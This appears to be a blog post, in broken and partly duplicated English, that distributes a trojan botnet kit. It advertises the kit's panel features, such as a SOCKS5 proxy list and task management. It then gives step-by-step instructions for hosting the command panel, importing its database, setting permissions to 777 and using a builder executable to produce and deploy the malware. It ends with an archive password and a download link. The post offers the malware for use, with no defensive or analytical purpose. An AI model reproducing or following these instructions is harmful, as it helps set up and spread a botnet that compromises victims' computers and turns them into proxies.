+ Nice looking Ajax Panel
+ Hardcoded Password -> secure
+ Taskmanagement System
+ Export Online SOCKS5 LIST[/B]
+ Hardcoded Password -> secure
+ Taskmanagement System
+ Export Online SOCKS5 LIST[/B]
manual installation
2. After downloading you should have. RAR files. Remove it and it should look as follows:
3 Now you need hosting, to download it. I would suggest hostinger
Create an account there with subdomain etc.
Create an account there with subdomain etc.
4 . Once your subdomain is ready , go to the Control Panel.
5 . in the Control Panel go to Advanced , and then " Databases MySQL".
6. Fill in the required details.
7. Next to the " Databases MySQL, should not be the task of " PhpMyAdmin ". Click on it. Then must show your created database . Press « PhpMyAdmin ».
8. Now you are in PhpMyAdmin. Goto to import, then Browse to dump.sql, which you can find in the section "WebPanel" folder. Download it and you're done .
9. Then select "File Manager 1 "
10 . Go to Public_HTML folder.
11. Click the Download button and go to "Webpanel.zip" archive ( make sure you load it on the right side .
12. After a successful upload, back to the file manager, select the folder and press WebPanel "CHMOD"
13. CHMOD the folder to 777 and check the two fields below.
14. Okay, now you have downloaded files. Now you need to edit one of the data files MySQL, which can be found in time. "Databases MySQL" in the Control Panel
. 15. Navigate to the / WebPanel / Admin / INC / config.php and click Edit
16 Now you will see a file with PHP, you have to edit it with databases MySQL, I SPECIFICATIONS:
17 Now go to your website: http://www.yoursite.com/Webpanel/
.. Box of "Password" should appear default password "Admin" To change the password edit index.php which you can find in / WebPanel / index.php
.. Box of "Password" should appear default password "Admin" To change the password edit index.php which you can find in / WebPanel / index.php
18. Username and your panel should look as follows:
19. Now we go to the builder of the open Cythbuilder.exe and edit data, as I have (for example):
Get 20 under construction. exe and deployed it.
Password freetrojanbotnet.com
Download https://mega.nz/#!DJknmLiQ!PbwW6Gz6kZ2fMsZhidCRFpzC9mvRGIjZrBNQiteesKY
saada
Subscribe to:
Posts (Atom)